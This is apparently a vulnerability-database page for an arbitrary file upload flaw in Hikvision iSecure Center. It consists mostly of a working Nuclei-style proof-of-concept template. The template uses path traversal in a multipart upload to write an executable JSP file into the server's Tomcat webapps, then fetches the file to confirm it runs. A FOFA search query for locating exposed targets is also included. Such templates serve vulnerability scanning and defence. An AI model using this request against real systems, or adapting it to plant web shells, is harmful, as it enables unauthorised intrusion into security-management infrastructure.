hikvision-js-files-upload: Hikvision iSecure Center - File Upload

日期: 2025-08-01 | 影响软件: hikvision iSecure Center | POC: 已公开

漏洞描述

THikvision iSecure Center /center/api/files;.js has an arbitrary file upload vulnerability

PoC代码[已公开]

id: hikvision-js-files-upload

info:
  name: Hikvision iSecure Center - File Upload
  author: Xc1Ym
  severity: critical
  description: |
    THikvision iSecure Center /center/api/files;.js has an arbitrary file upload vulnerability
  reference:
    - https://zhuanlan.zhihu.com/p/639514473
    - https://mp.weixin.qq.com/s/DR9xbwnrpg6YYSTw5pIAhw
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/hikvision-files-upload.yaml
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台"
  tags: fileupload,iot,hikvision,intrusive,vuln
variables:
  filename: '{{rand_base(6)}}'
  payload: '{{rand_base(6)}}'
  print: '<%out.print("{{payload}}");%>'

http:
  - raw:
      - |
        POST /center/api/files;.js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{{filename}}.jsp"
        Content-Type:image/jpeg

        {{print}}
        ------WebKitFormBoundarygcflwtei--
      - |
        GET /clusterMgr/{{filename}}.jsp;.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{payload}}")'
        condition: and
# digest: 4b0a00483046022100815698b80e92b12ada0f42d832683026349b48c6fedfd26f6dbaba70fa6c9b6a022100afbc7626058b59f658b7963362a374cbeb09c590fbd3176c943e794a837290ec:922c64590222798bb761d5b6d8e72950

相关漏洞推荐